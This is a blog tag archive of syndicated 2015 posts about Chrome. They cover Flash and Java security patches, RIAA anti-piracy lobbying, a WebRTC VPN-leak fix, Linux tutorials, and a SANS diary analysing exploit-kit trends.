Posts tagged ‘chrome’

LWN.net: Starting in September, Chrome will stop auto-playing Flash ads

This post was syndicated from: LWN.net and was written by: n8willis. Original post: at LWN.net

Google has announced
that, beginning September 1, Chrome will no longer auto-play
Flash-based ads in the company’s popular AdWords program. The post
frames this as a move to improve browsing performance for users, and
notes that most Flash ads are automatically converted to HTML5
already. Commenting on the news, The Register notes
that the change should also offer some additional protection against
malware delivered via Flash. Chrome will continue to auto-play Flash
content in the main body of pages, however. The Register‘s story says
the change is, in fact, just a modification of the default setting for
plugin behavior, which already supports
an option to disable plugin content not deemed “important.” Mozilla,
of course, blacklisted the Flash
plugin in July, although that action only disabled the then-current,
vulnerable release—which was subsequently updated.

TorrentFreak: Should Web Browsers Block Copyright Infringing URLs?

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

stop-blockedWith more than 150 million active users per month uTorrent is without a doubt the most popular file-sharing application.

Many people use the software to download pirated material, which worries copyright holder groups such as the RIAA.

Earlier this month the music group sent a letter to uTorrent’s parent company BitTorrent Inc. urging it to do something about this unauthorized use. Ideally, the RIAA would like infringing hashes to be banned so that users can no longer share these files.

“We are willing to establish a process to share the hashes with BitTorrent Inc. on a regular basis so that BitTorrent Inc. can use the information to deter further infringement of those files via its goods and services,” the RIAA wrote in a letter to the company.

Technically speaking it’s quite easy to block hashes. Several BitTorrent trackers already do this to keep copyright holders appeased, but thus far this has been a bridge too far for the company behind uTorrent.

BitTorrent Inc. hasn’t responded to our repeated requests for comment, but in a brief statement provided to Venturebeat the company notes that the protocol is open source, legal and that they themselves don’t host any infringing content. This is true, but the response also misses the main point.

The RIAA’s request isn’t about the protocol or the technology. It’s about adding a piracy prevention mechanism to a neutral piece of software. Should BitTorrent be obliged to do that?

Legally speaking BitTorrent Inc isn’t required to take any action. Browser developers don’t have to block infringing URLs either, even though hundreds of millions of people use their software to download or stream pirated content.

However, the RIAA’s letter shows that the music group is trying to shift this obvious boundary, and they are not only focusing on BitTorrent.

TF has learned that the RIAA and MPAA are pushing for automated pirate site blocking/warning technology. Outright takedown requests to browser vendors are not going to happen anytime soon, but subtle changes may appear.

The RIAA previously noted that it would like Google to expand Chrome’s malware warning system to cover pirate sites. This would mean that users see a red warning screen when they attempt to visit known piracy sites.

For its part the MPAA is actively lobbying for “site scoring” tools behind closed doors. A leaked copy of the group’s anti-piracy strategies lists site scoring services, which identify pirate sites, as a high priority.

The Hollywood group writes that these pirate site lists can then be used as a blocking tool by advertisers, payment processors, domain name registrars, hosting providers and search engines. Web browsers are not mentioned specifically, but it’s not hard to imagine these also appearing on the MPAA’s wish list.

In any case, the efforts outlined above show that copyright holders would like to extend anti-piracy measures beyond traditional service providers to software vendors. Today it’s BitTorrent clients but browser vendors may be next.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

Krebs on Security: Adobe, MS Push Patches, Oracle Drops Drama

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe today pushed another update to seal nearly three dozen security holes in its Flash Player software. Microsoft also released 14 patch bundles, including a large number of fixes for computers running its new Windows 10 operating system. Not to be left out of Patch Tuesday, Oracle‘s chief security officer lobbed something of a conversational hand grenade into the security research community, which responded in kind and prompted Oracle to back down.

brokenflash-aAdobe’s latest patch for Flash (it has issued more than a dozen this year alone) fixes at least 34 separate security vulnerabilities in Flash and Adobe AIR. Mercifully, Adobe said this time around it is not aware of malicious hackers actively exploiting any of the flaws addressed in this release.

Adobe recommends users of Adobe Flash Player on Windows and Macintosh update to Adobe Flash Player 18.0.0.232. Adobe Flash Player installed with Google Chrome will be automatically updated to the latest Google Chrome version, which will include Adobe Flash Player 18.0.0.232 on Windows and Macintosh, and version 18.0.0.233 for Linux and Chrome OS.

However, I would recommend that if you use Flash, you should strongly consider removing it, or at least hobbling it until and unless you need it. Disabling Flash in Chrome is simple enough, and can be easily reversed: On a Windows, Mac, Linux or Chrome OS installation of Chrome, type “chrome:plugins” into the address bar, and on the Plug-ins page look for the “Flash” listing: To disable Flash, click the disable link (to re-enable it, click “enable”). Windows users can remove Flash from the Add/Remove Programs panel, or use Adobe’s uninstaller for Flash Player.

If you’re concerned about removing Flash altogether, consider a dual-browser approach. That is, unplugging Flash from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Flash.

If you decide to proceed with Flash and update, the most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.)

MICROSOFT

Microsoft may have just released Windows 10 as a free upgrade to Windows 7 and 8 customers, but some 40 percent of the patches released today apply to the new flagship OS, according to a tally by security firm Qualys. There is even an update for Microsoft Edge, the browser that Microsoft wants to replace Internet Explorer.

win10Nevertheless, IE gets its own critical update (MS15-089), which addresses at least 13 flaws — most of which can be exploited remotely without any help from the user, save from perhaps just visiting a hacked or malicious site.

Another notable update plugs scary-looking flaws in Microsoft Office (MS15-081). Qualys says it appears the worst of the flaws fixed in the Office patch could be triggered automatically — possibly through the Outlook e-mail preview pane, for example.

According to security firm Shavlik, there are two flaws fixed in today’s release from Microsoft that are being actively exploited in the wild: One fixed in the Office Patch (CVE-2015-1642) and another in Windows itself (CVE-2015-1769). Several other vulnerabilities fixed today were publicly disclosed prior to today, increasing the risk that we could see public exploitation of these bugs soon.

If you run Windows, take some time soon to back up your data and update your system. As ever, if you experience any issues as a result of applying any of these updates, please leave a note about your experience in the comments section.

ORACLE

I’ve received questions from readers about a rumored software update for Java (Java 8, Update 60); I have no idea where this is coming from, but this should not be security-related patch. Generally speaking, even-numbered Java updates are non-security related. More importantly, Oracle has moved to releasing security updates for Java on a quarterly patch cycle, except for extreme emergencies (and I’m unaware of a dire problem with Java right now, aside perhaps from having this massively buggy and insecure program installed in the first place).

Alas, not to be left out of the vulnerability madness, Oracle’s Chief Security Officer Mary Ann Davidson published a provocative blog post titled “Don’t, Just Don’t” that stirred up quite a tempestuous response from the security community today.

Davidson basically said security researchers who try to reverse engineer the company’s code to find software flaws are violating the legal agreement they acknowledged when installing the software. She also chastised researchers for spreading “a pile of steaming FUD” (a.k.a. Fear, Uncertainty and Doubt).

Oracle later unpublished the post (it is still available in Google’s cache here), but not before Davidson’s rant was lampooned endlessly on Twitter and called out by numerous security firms. My favorite so far came from Twitter user small_data, who said: “The City of Rome’s EULA stipulates Visigoths cannot recruit consultants who know about some hidden gate to gain entry.”

Images posted by Twitter users posting to the sacrastic hashtag #oraclefanfic

Images posted by Twitter users posting to the sacrastic hashtag #oraclefanfic

TorrentFreak: Google Publishes Chrome Fix For Serious VPN Security Hole

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

As large numbers of Internet users wise up to seemingly endless online privacy issues, security products are increasingly being viewed as essential for even basic tasks such as web browsing.

In addition to regular anti-virus, firewall and ad-busting products, users wishing to go the extra mile often invest in a decent VPN service which allow them to hide their real IP addresses from the world. Well that’s the theory at least.

January this year details of a serious vulnerability revealed that in certain situations third parties were able to discover the real IP addresses of Chrome and Firefox users even though they were connected to a VPN.

This wasn’t the fault of any VPN provider though. The problem was caused by features present in WebRTC, an open-source project supported by Google, Mozilla and Opera.

By placing a few lines of code on a website and using a STUN server it became possible to reveal not only users’ true IP addresses, but also their local network address too.

While users were immediately alerted to broad blocking techniques that could mitigate the problem, it’s taken many months for the first wave of ‘smart’ solutions to arrive.

Following on the heels of a Chrome fix published by Rentamob earlier this month which protects against VPN leaks while leaving WebRTC enabled, Google has now thrown its hat into the ring.

Titled ‘WebRTC Network Limiter‘, the tiny Chrome extension (just 7.31KB) disables the WebRTC multiple-routes option in Chrome’s privacy settings while configuring WebRTC not to use certain IP addresses.

In addition to hiding local IP addresses that are normally inaccessible to the public Internet (such as 192.168.1.1), the extension also stops other public IP addresses being revealed.

“Any public IP addresses associated with network interfaces that are not used for web traffic (e.g. an ISP-provided address, when browsing through a VPN) [are hidden],” Google says.

“Once the extension is installed, WebRTC will only use public IP addresses associated with the interface used for web traffic, typically the same addresses that are already provided to sites in browser HTTP requests.”

While both the Google and Rentamob solutions provide more elegant responses to the problem than previously available, both admit to having issues.

“Some WebRTC functions, like VOIP, may be affected by the multiple routes disabled setting. This is unavoidable,” Rentamob explains.

Google details similar problems, including issues directly linked to funneling traffic through a VPN.

“This extension may affect the performance of applications that use WebRTC for audio/video or real-time data communication. Because it limits the potential network paths, WebRTC may pick a path that results in significantly longer delay or lower quality (e.g. through a VPN). We are attempting to determine how common this is,” the company concludes.

After applying the blocks and fixes detailed above, Chrome users can check for IP address leaks by using sites including IPLeak and BrowserLeaks.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and the best VPN services.

Linux How-Tos and Linux Tutorials: Installing Android Apps on Linux with ARChon

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

android apps on linux

I’ve spent a lot of time on the Google Play Store. During that time I have discovered plenty of really useful apps that would be great on the Linux desktop. Fortunately, thanks to some crafty developers, it is quite possible (and actually easy) to run Android apps on the Linux desktop.

Of course, this statement does come with some caveats. First and foremost, this is all handled with the help of the Chrome browser. To make matters easier, you’ll need to be running the Chrome Developer channel. The second caveat is that not all apps will actually work. That some apps do not function should not surprise you (you won’t be getting an app that requires the functionality of a phone service to run on your desktop). As for other apps, the results can be hit and miss. The third caveat is that, to make this process easier, you’ll also need an Android device to package the .apk file that will be used on the desktop.

With that said, let’s dive into the process of getting Android apps running on Linux. I will be demonstrating on an Ubuntu 14.04 LTS installation.

Installing Chrome

If you haven’t already installed Chrome, let’s walk through that quick process. Remember, you’re installing the dev channel (you can safely install all three channels—stable, beta, and dev—on the same machine). Here’s how this is done:

  1. From the download page, select the installer associated with your package manager and architecture (because I’m using Ubuntu, I’ll download a .deb file)
  2. Click Accept and Install
  3. When prompted, select Open with and make sure /usr/bin/software-center (default) is selected
  4. Click OK
  5. When the Software Center opens, click Install
  6. When prompted, enter your sudo password
  7. Allow the installation to complete.

You should now find an entry for Google Chrome (unstable) in your Dash (Figure 1, above).

Installing ARChon

The tool that will do the heavy lifting for this task is called ARChon. This is an Android runtime, created by Vlad Filippov, which brings a specialized version of the Android runtime that works on the desktop version of Chrome. This phase of the process is also quite simple:

  1. Download the ARChon runtime for your architecture—32-bit or 64-bit
  2. Open your file manager and navigate to the Downloads directory (or wherever you have downloaded the .zip file)
  3. Right-click the ARChon zip file and select Extract Here
  4. Rename the newly created folder (right-click and select Rename) to archon
  5. Move the newly named folder to your home directory (right-click on archon, select Move To…, select Home, and click Select (Figure 2).

android

Adding ARChon to Chrome

It’s time to add the runtime to Chrome. This will enable you to finally run those Android apps on your desktop. Here’s how:

  1. Open Chrome
  2. Click on what is often referred to as the Overflow Menu (three horizontal bars in the top right corner)
  3. Select More tools > Extensions
  4. Click to enable Developer mode
  5. Click Load unpacked extension… (Figure 3)
  6. Navigate to your home directory
  7. Select archon
  8. Click Open. 

android-3

ARChon should now appear in the listing of Chrome extensions.

Generating APKs

Now we move over to the Android platform. It used to be necessary to build APK files manually (which wasn’t always successful). Thankfully, there are now apps for Android that can build APKs with a few taps. The app I prefer is called ARChon Packager and can be installed from within the Google Play Store for free. Install that app, and you’re ready to go.

With ARChon Packager, you can generate APKs from installed apps or from APKs within the phone’s storage. I highly recommend you install the desired app onto your phone and then have ARChon Packager generate the APK from the installed app.

Here’s how to use ARChon Packager. 

  1. Open the app from your Android device
  2. Tap NEXT
  3. Select Installed application and tap NEXT
  4. Select the app you want to install from the pop-up listing
  5. Select the necessary options for the app (Figure 4)
  6. Tap NEXT
  7. When the APK generation is complete, tap SHARE CHROME APPLICATION
  8. Share the file in whatever way will best allow you to save it to your desktop (I opted for Google Drive)
  9. Click FINISH when complete. 

Android-Linux-ARChon-4

Retrieve the file and save it to your ~/Downloads directory on your Linux PC.

Installing the APK

You’re ready to now install the app. This is done in the same manner as was ARChon. Here are the steps:

  1. Open up your file manager
  2. Navigate to the ~/Downloads directory
  3. Right-click the downloaded APK zip file
  4. Select Extract here
  5. Open Chrome
  6. Click the Overflow Menu
  7. Click More Tools > Extensions
  8. Click Load unpacked extension…
  9. Navigate to the ~/Downloads directory
  10. Select the folder for the newly extracted APK
  11. Click Open.

That’s it! Now, if the app is usable on the desktop version of Chrome, it should be ready to run.

Running the App

Chrome has a handy tool called Apps. Open Chrome and you should see a button in the upper left corner labeled Apps. Click on that and the newly installed apps will be ready to run. Click on the app you want to run to see how well it functions. To demonstrate, I installed the Nest App from the Google Play Store to find it runs flawlessly (Figure 5). 

Android-Linux-ARChon-5 copy

The ability to easily run Android apps on Linux is a real boon to the desktop. Not only does this functionality extend the reach of the desktop, it empowers it to join the ever-expanding mobile generation. If you happen to enjoy the Android platform, give this a try and see how well your favorite mobile apps perform on the Linux desktop.

TorrentFreak: uTorrent Flagged As ‘Harmful’ by Anti-Virus Companies and Google

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

utorrent-logo-newWith millions of new downloads per month uTorrent is without doubt the most used BitTorrent client around.

The software is the main source of revenue for the San Francisco based company BitTorrent Inc. and generates income through advertisements and bundled software.

The latter now appears to be causing trouble as several anti-virus vendors have begun listing uTorrent as a security risk. The scanning result below from VirusTotal shows that at least six anti-virus applications, including ESET and Symantec, have flagged the software as problematic.

The anti-virus scans associate the uTorrent.exe file with Trojan.Win32.Generic!BT and the controversial OpenCandy bundling software. While this isn’t the first time that uTorrent has been flagged in this manner, we haven’t seen it being reported by this many independent tests before.

uTorrent’s Virustotal results
utorrentvirus

In addition to action by the anti-virus companies, uTorrent is also being blocked by Google in several ways. When attempting to download the latest stable release of the torrent client, Chrome flags the software as malicious and blocks the download, although this only appears to happen sporadically.

Google is also actively blocking several pages that link to uTorrent and other BitTorrent Inc. software. According to Google, parts of the uTorrent website contain “harmful programs.”

uTorrent.com warning in Chrome
utorrentharm

The same “harmful software” warning from Google also prevented millions of people from accessing popular torrent sites earlier this month.

A Google spokesperson informed us that this was the result of the company’s increased efforts to block programs that make “unexpected changes” to people’s computers.

“Google Safe Browsing’s ability to detect deceptive software has steadily improved,” the company explained in a recent blog post.

“In the coming weeks, these detection improvements will become more noticeable in Chrome: users will see more warnings about unwanted software than ever before,” Google adds.

These and the other uTorrent threat reports all seem to be triggered by bundled third-party software bundled. There is no indication or evidence that the BitTorrent client itself is harmful.

We asked BitTorrent Inc. for a comment on the recent reports but the company has yet to respond.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and the best VPN services.

Linux How-Tos and Linux Tutorials: Which Linux Chrome OS Clone is Right For You?

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Solus desktop

When the Chromebook first arrived on the scene, most people thought they’d go the way of the netbook. Maybe the little laptops that could would hang around for a brief period and, once the novelty of the price tag wore off, they’d go away to make room for the devices that do the real work. 

Thing is, said real work (from an end-user perspective) tends to be 90 percent browser based. So the Chromebook hung around and eventually became one of the hottest selling devices on the market. Beyond price, one of the reasons for the incredible popularity of the Chromebook is its simplicity. Across the landscape of the PC-verse, it doesn’t get much easier than ChromeOS. However, because Chrome OS is a proprietary solution, owned by Google, you cannot simply download the platform and install it on common x86/64 hardware. To get around that, there are approximations available that can be installed on off-the-shelf hardware that recreate the Chrome OS experience. 

With that in mind, it makes perfect sense that a handful of Chrome OS-like Linux distributions would appear. In theory, it’s a perfect amalgamation of simplicity and power. You get the ease of use found with ChromeOS and the added power of the full-blown Linux platform. 

But if you’re looking to get such elegant simplicity with the added power, where do you turn? A handful of Linux distributions have popped up over the last few years that do an outstanding job of re-creating ChromeOS. Which of these do the best job of mimicking Chrome OS and which manage to retain all that which makes Linux an outstanding platform?

Here are my top contenders for this title.

Solus

Solus started out as Evolve OS and is, to date, one of the finest Linux distributions to take a swing at the Chrome OS platform. The developers of Solus promise a “no scope-creep” platform that will provide a modern desktop-focused Linux distribution. Under the hood, Solus is pure Linux. In this case, it’s what’s on top that counts… that being the Budgie desktop (Figure 1).

This is a singular desktop environment created to almost perfectly mimic the Chrome OS experience. Budgie does integrate with the GNOME stack, so there is not only the familiar minimalism of Chrome OS, but the power of GNOME underneath. Another unique feature of Solus is the package manager. Forked from Pardus Linux, the package manager offers the same level of simplicity found in Budgie (Figure 2).

budgie desktop

What is most impressive about Solus is that this is a fairly new project and is already enjoying an amazing level of stability. Once installed, you’d think you were using a distribution that’s been around the block a few times. Consider this—Solus started out as Evolve OS and the beta of the initial release was only just available January 2015. Now dubbed Solus, the platform is already a production-ready desktop. Another very impressive aspect of Solus is how much thought was put into the overall design. Each and every tool was perfectly themed to retain the look and feel of Solus throughout.

If you’re looking for the one distribution that best fits the Chrome OS mode, and adds just enough Linux to make it more flexible than the official release, Solus is what you’re looking for.

Chromixium

Chromixium is next in line for the title of best in breed for ChromeOS clone. This particular take on Chrome OS is based on Ubuntu Linux, so it already has quite a lot going for it. But the bits and pieces of Ubuntu are mostly under the hood. It’s what’s on top of the hood that will interest most Linux users. The Chromixium distribution uses an old-school approach with the help of the Openbox Window Manager (a derivation of the original Blackbox WM).

What sets Chromixium apart from Solus is the menu system. If you look on the desktop (Figure 3), you’ll find the ChromeOS-looking menu button that you can click to gain access to all the Googly-goodness the desktop has to offer. 

Chromixium google menu

If, however you right-click anywhere on the desktop, you’ll find an Openbox menu ready to give you access to all of the Linux-goodness the desktop has to offer (Figure 4). 

Figure 4: The Chromixium “Linux” menu.

At first, this might seem like a clunky means to handle the desktop menu system. However having the Google bits isolated from everything else does make for an efficient means of isolating searches (as you can search Google from the Chromixium desktop menu).

If you’re looking for a ChromeOS-like Linux distribution that offers a nod to a bit of old-school Linux, give Chromixium a go.

Chromium OS

Chromium OS is an open source project that forms the base of Google’s Chrome OS. This means you can expect a fairly pure form of Chrome OS on your standard hardware. Of course, getting ChromiumOS up and running isn’t nearly as simple as that of either Solus or Chromixium. For ChromiumOS, you either run the platform from a USB flash drive or from a virtual image (with the help of VirtualBox) and then install the platform. This fact does make ChromiumOS a bit of a challenge for the average user, but if you’re interested, you can follow these steps to get ChromiumOS ready to run from a USB drive: 

  1. Download the appropriate image (according to your architecture)

  2. Insert a flash drive

  3. Extract the downloaded file

  4. Open a terminal window

  5. Change into the directory containing the newly extracted image file

  6. Issue the command (using admin rights—so either by su’ing to root or using sudo) dd if=ChromeOS.img of=/dev/sdX bs=4M (Where ChromeOS.img is the full name of the image file and sdX is the location of your flash drive*)

  7. Allow the command to finish

  8. You should now have a bootable Chromium OS USB drive.

* To find out the location of the mounted flash drive, you can issue the command mount and check for the exact location of the drive.

NOTE: If the above instructions fail to produce a working bootable USB drive, you can try using the Win32 Image Writer instead (you’ll need a working copy of Windows for this).

Once you have Chromium OS up and running, you can install the operating system to your hard drive but it will erase your entire drive (You can dual boot but you must install the other OS first and it’s not nearly as easy as dual booting with a standard Linux OS). Also, just to be safe, unplug any external or internal drives that contain data you do not want erased. For information on the actual installation of Chromium OS, check out the official how-tos here and here.

As you might expect, Chromium OS is that which Chrome OS is built upon, so you won’t find any extra Linux goodness within the menu. But, if you’re looking for a pure Chrome OS experience on your non-chromebook hardware, this is the way to go.

Which ChromeOS clone is best?

Which route you take to Chrome OS depends on your needs. If you’re looking for Pure Chrome OS, you’ll want to go with Chromium OS. If you’re looking for a nearly-identical Chrome OS experience, with an additional boost from the Linux desktop, go with Solus. If you want the best of both worlds, give Chromixium a try.

One way or another, you’ll have the look and feel of Chrome OS working on your non-Chromebook hardware.

SANS Internet Storm Center, InfoCON: green: After Flash, what will exploit kits focus on next?, (Thu, Jul 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Introduction

Adobe has received some bad publicity regarding zero-day Flash player exploits due to the recent Hacking Team compromise [1,2]. This certainly isnt the first time Adobe hashadsuch issues[3]. With HTML5 video as an alternative to Flash player, one might wonder how long Flash player will be relevant. Google has announced the next stable version of Chrome will block auto-playing Flash elements [4], and Firefox started blacklisting Flash player plugins earlier this week [5]. With people like Facebooks chief security officer calling for Adobe to announce an end-of-life date for Flash [6], Ive been wondering about the future of Flash player.

More specifically, Ive been wondering what exploit kit (EK) authors will turn to, once Flash player is no longer relevant.

In recent months, most EK traffic Ive generated used a Flash exploit to infect vulnerable Windows hosts. The situation with Flash player today is much like the situation with the Javathat Irememberback in 2013 and most of 2014. However, in the fall of 2014, most EKs dropped Java exploits from their arsenal and started relying on Flash player as a vehicle for their most up-to-date exploits.

A recent history Java exploits in EK traffic

Java exploits were prevelant when I first started blogging about EK traffic in 2013 [7]. Back then, Blackhole EK was still a player, and I commonly saw Java exploits in EK traffic.

The threat landscape altered a bit when the EKs alleged creator Paunch was arrested. Organizations that monitor EK traffic noticed a sharp reduction of Blackhole EK traffic in 2014 compared to the previous year [8]. Duringthatsame time, I started noticing moreFlash exploits in EK traffic.By September 2014 most of the remaining EKs stopped using Java.

My last documented dates for Java exploits in exploit kit traffic are below (read: exploit kit name- date Java exploit last seen).

  • Angler EK – 2014-09-16 [9]
  • FlashPack EK – 2014-08-30 [10]
  • Nuclear EK – 2014-09-08 [11]
  • Magnitude EK – 2014-08-15 [12]
  • Sweet Orange EK – 2014-09-25 [13]
  • Rig EK – 2014-09-06 [14]

Of note, FlashPack EK and Sweet Orange EK have disappeared, and they are not currently a concern. Neutrino EK was dormant from April through October of 2014, and when it came back, I didnt see it using any Java exploits.

Fiesta EK still sends several different types of exploits depending on the vulnerable client, and it still has Java exploits in its arsenal. Other lesser-seen EKs like KaiXin still use Java exploits. However, the majority of EKs gave up on Java sometime last year.

What were recently seeing with Flash exploits

Most exploit kits use the latest available Flash exploits. Angler, Neutrino, Nuclear, Magnitude, and Rig EK are all using the latest Hacking Team Flash player exploit based on CVE-2015-5122 [15]. If youhave Flash player on a Windows computer, you should be running the most recent Flash update (version 18.0.0.209 as Im writing this).

Earlier I generated Angler EK traffic to infect a Windows host running Flash player 18.0.0.203 on IE 11.” />
Shown above: An image of the Angler EK infection and post-infection CryptoWall 3.0 traffic in Wireshark. ” />
Shown above: Angler EK sending a Flash exploit, based on CVE-2015-5122, targeting Flash 18.0.0.203.

The infected hostsbitcoin address for ransompaymentwas 1LY58fiaAYFKgev67TN1UJtRveJh81D2dU. The address is the same one” />
Shown above: Decrypt instructions from the infected host.

Final words

Today, the majority ofEKs utilizeFlash player exploits based on the most recently knownvulnerabilities. But this situation cant last forever. If Flash is no longer relevant, what will EK authors turn to for their latest exploits? Will they go back to Java? Will they focus on browser vulnerabilities? It will be interesting to see where things stand in the next year or so.

A pcap of the 2015-07-15 Angler EK infection traffic is available at:

A zip file of the associated malware is available at:

The zip file is password-protected with the standard password. If you dont know it, email admin@malware-traffic-analysis.net and ask.


Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net – Twitter: @malware_traffic

References:

[1] https://krebsonsecurity.com/2015/07/adobe-to-patch-hacking-teams-flash-zero-day/
[2] http://www.pcworld.com/article/2947312/second-flash-player-zeroday-exploit-found-in-hacking-teams-data.html
[3] http://krebsonsecurity.com/2015/02/yet-another-flash-patch-fixes-zero-day-flaw/
[4] http://arstechnica.co.uk/information-technology/2015/06/google-chrome-will-soon-intelligently-block-auto-playing-flash-ads/
[5] http://arstechnica.com/security/2015/07/firefox-blacklists-flash-player-due-to-unpatched-0-day-vulnerabilities/
[6] https://twitter.com/alexstamos/status/620306643360706561
[7] http://malware-traffic-analysis.net/2013/06/18/index.html
[8] http://www.symantec.com/connect/blogs/six-months-after-blackhole-passing-exploit-kit-torch
[9] http://malware-traffic-analysis.net/2014/09/16/index2.html
[10] http://malware-traffic-analysis.net/2014/08/30/index.html
[11] http://malware-traffic-analysis.net/2014/09/08/index2.html
[12] http://malware-traffic-analysis.net/2014/08/15/index.html
[13] http://malware-traffic-analysis.net/2014/09/25/index.html
[14] http://malware-traffic-analysis.net/2014/09/06/index.html
[15] http://malware.dontneedcoffee.com/2015/07/cve-2015-5122-hackingteam-0d-two-flash.html
[16] https://isc.sans.edu/forums/diary/Another+example+of+Angler+exploit+kit+pushing+CryptoWall+30/19863/

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: Adobe, MS, Oracle Push Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

This being the second Tuesday of the month, it’s officially Patch Tuesday. But it’s not just Microsoft Windows users who need to update today: Adobe has released fixes for several products, including a Flash Player bundle that patches two vulnerabilities for which exploit code is available online. Separately, Oracle issued a critical patch update that plugs more than two dozen security holes in Java.

ADOBE

Adobe’s Flash patch brings Flash to version 18.0.0.209 on Windows and Mac systems. This newest release fixes two vulnerabilities that were discovered as part of the Hacking Team breach. Both flaws are exploitable via code that is already published online, so if you must use Flash please take a moment to update this program.

brokenflash-aIf you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to the latest version. To force the installation of an available update on Chrome, click the triple bar icon to the right of the address bar, select “About Google” Chrome, click the apply update button and restart the browser.

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.)

Please consider whether you really need Flash installed. It is a powerful program that is being massively leveraged by cybercriminals to break into systems. Monday’s post includes more information on how to remove Flash from your computer, depending on what operating system you use.

Adobe also issued security updates for Adobe Acrobat and its PDF Reader programs that fix at least 46 vulnerabilities in these products. Links to the latest versions of both programs are available in the Acrobat/Reader security advisory.

Finally, Adobe released a security update for its Shockwave Player software for Windows and Mac. This is another Adobe product that I have long urged people to uninstall, largely because most users have no need for Shockwave and it’s just as buggy as Flash but it doesn’t get updated nearly enough. In any case, links to the latest version of Shockwave are available in the advisory.

MICROSOFT

brokenwindowsWith today’s 14 patch bundles, Microsoft fixed dozens of vulnerabilities in Windows and related software. A cumulative patch for Internet Explorer corrects at least 28 flaws in the default Windows browser. Three of those IE flaws were disclosed prior to today’s patches, including one zero-day flaw uncovered in the Hacking Team breach.

Most of these IE bugs are browse-and-get-owned vulnerabilities, meaning IE users can infect their systems merely by browsing to a hacked or malicious Web site.

Another noteworthy update fixes at least eight flaws in various versions of Microsoft Office, including one (CVE-2424) that is actively being exploited by attackers.

More detailed summaries of the Microsoft patches released today can be found at Microsoft’s Security Bulletin Summary for July 2015, and at the Qualys blog.

ORACLE

Oracle’s patch for Java SE includes fixes for 25 security vulnerabilities, including a flaw that is already being actively exploited to break into systems running Java SE. A blog post by Trend Micro has more on the Java zero-day flaw, which was apparently used in targeted attacks in a cyber espionage campaign.

javamessThe latest version, Java 8 Update 51, is available from Java.com. But if you use Java, please take a moment to consider whether you still need this program on your computer. Java is yet another program that I have long urged users to do without, for most of the same reasons I’ve urged readers to ditch Flash and Shockwave: this widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, there is a way to have this program installed while minimizing the chance that crooks will exploit unknown or unpatched flaws in the program: unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play, which can block Web sites from displaying both Java and Flash content by default).

The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

Many people confuse Java with  JavaScript, a powerful scripting language that helps make sites interactive. Unfortunately, a huge percentage of Web-based attacks use JavaScript tricks to foist malicious software and exploits onto site visitors. For more about ways to manage JavaScript in the browser, check out my tutorial Tools for a Safer PC.

Linux How-Tos and Linux Tutorials: 10 Things to Do After Installing Linux Mint 17.2

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Swapnil Bhartiya. Original post: at Linux How-Tos and Linux Tutorials

The latest version of Linux Mint is out and it’s a major improvement over the previous releases (see my recent review). Linux Mint developers do a lot of additional work, on top of its Ubuntu base, which leaves users with comparatively less work to do after installation. For example, Linux Mint comes pre-loaded with restricted drivers and codecs. It also comes with VLC so users don’t have to worry about media playback.

That said, like any other operating system, depending on your needs, you may have to do some extra work to get your Linux Mint system ready. While some of the changes in this article are optional, a few are mandatory: such as keeping your system up-to-date.

Here are 10 things to do after you install Mint 17.2.

First of all you need to update the system

Even if you downloaded the brand new Linux Mint, from the time it was packaged and uploaded to the server and you downloaded it a lot of Open Source code has been written. The first thing you must do is run a system update before installing any new package. There are two steps involved with a system update: first, you refresh the repositories so they can pull information about the latest packages and then upgrade any package. You can do so by running this command (you must refresh your repositories before installing any package):

sudo apt-get update

Once all the info is refreshed, run the update:

sudo apt-get upgrade

I would also recommend running “sudo apt-get dist-upgrade” which can upgrade packages that the simple ‘upgrade’ command can’t (you can read more about the difference between two commands here).

sudo apt-get dist-upgrade

Install additional drivers

Ubuntu based systems have made it really easy to manage drivers (both open source and non-free) for various hardware. Open the Driver Manager tool which will scan your system and detect the supported hardware which may need non-free drivers. It will then offer appropriate drives for it and you can install the desired drivers for your hardware.

Install Google Chrome?

